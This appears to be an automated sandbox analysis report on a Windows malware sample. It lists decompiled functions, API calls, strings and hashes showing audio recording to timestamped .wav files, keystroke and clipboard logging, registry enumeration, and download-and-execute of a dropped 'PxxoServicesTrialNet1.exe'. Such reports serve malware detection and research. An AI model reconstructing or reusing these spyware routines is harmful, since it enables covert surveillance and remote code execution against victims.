				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}





























                                        0x0040be49
                                        0x0040be4f
                                        0x0040be54
                                        0x0040be5a
                                        0x0040be67
                                        0x0040be6d
                                        0x0040be6f
                                        0x0040bfea
                                        0x0040bff7
                                        0x0040be75
                                        0x0040be78
                                        0x0040be80
                                        0x0040be81
                                        0x0040be86
                                        0x0040be88
                                        0x0040be88
                                        0x0040be90
                                        0x0040beaf
                                        0x0040beb5
                                        0x0040beca
                                        0x0040becf
                                        0x0040bed8
                                        0x0040bedc
                                        0x0040bee5
                                        0x0040bee9
                                        0x0040bef2
                                        0x0040bef6
                                        0x0040beff
                                        0x0040bf03
                                        0x0040bf0c
                                        0x0040bf10
                                        0x0040bf19
                                        0x0040bf20
                                        0x0040bf2a
                                        0x0040bf39
                                        0x0040bf44
                                        0x0040bf4d
                                        0x0040bf56
                                        0x0040bf5f
                                        0x0040bf68
                                        0x0040bf71
                                        0x0040bf7a
                                        0x0040bf83
                                        0x0040bf8f
                                        0x0040bfa0
                                        0x0040bfac
                                        0x0040bfbd
                                        0x0040bfc9
                                        0x0040bfd2
                                        0x0040bfd8
                                        0x0040bfd8
                                        0x0040bfff
                                        0x0040c00b

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                          • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                          • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                        • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                          • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                          • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                          • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                          • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                          • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                        • String ID:
                                        • API String ID: 3909728815-0
                                        • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                        • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401640, Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                        0x00401649
                                        0x00401650
                                        0x0040165d
                                        0x00401668
                                        0x0040166e
                                        0x00401672
                                        0x00401687
                                        0x0040169e
                                        0x004016bb
                                        0x004016c4
                                        0x004016cd
                                        0x004016d1
                                        0x004016da
                                        0x004016de
                                        0x004016ea
                                        0x004016f3
                                        0x004016fc
                                        0x00401705
                                        0x0040170e
                                        0x00401717
                                        0x00401726
                                        0x0040172d
                                        0x0040173d
                                        0x00401748
                                        0x0040174e
                                        0x00401753
                                        0x00401758
                                        0x0040175f
                                        0x00401764
                                        0x00401769
                                        0x0040176e
                                        0x0040177c
                                        0x0040178b
                                        0x00401791
                                        0x00401795
                                        0x0040179c

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                        • time.MSVCRT ref: 00401668
                                        • localtime.MSVCRT ref: 00401672
                                        • strftime.MSVCRT ref: 00401687
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                          • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 4079669728-3597965672
                                        • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                        • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D4E5, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                        • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                        • free.MSVCRT(?,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040D643
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040D636
                                        • open, xrefs: 0040D5BA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$open
                                        • API String ID: 2294739476-1846506323
                                        • Opcode ID: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                        • Opcode Fuzzy Hash: 409004fbd4d77830aa8a5ec4fe989b6473c89031e6c1a4ce514544c42b28889c
                                        • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                        • toupper.MSVCRT ref: 0040698A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                        • toupper.MSVCRT ref: 00406A61
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A1D
                                        • tolower.MSVCRT ref: 00406A3A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                        Strings
                                        • [Ctrl + , xrefs: 00406996
                                        • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                        • [End of clipboard text], xrefs: 004069EC
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                        • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                        • API String ID: 1567161615-398269065
                                        • Opcode ID: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction ID: a9543fe512128afdcb68fc0767362bf76cb8ddc06e86ce3b10f85a644f0edd6d
                                        • Opcode Fuzzy Hash: f1e6f1152cf9d43577f9c2263c6a6138d0f68f1c9ac30bffadcf0155f9edcbe5
                                        • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6F5E5DF0), ref: 0041016E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                        • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                          • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                          • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                          • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
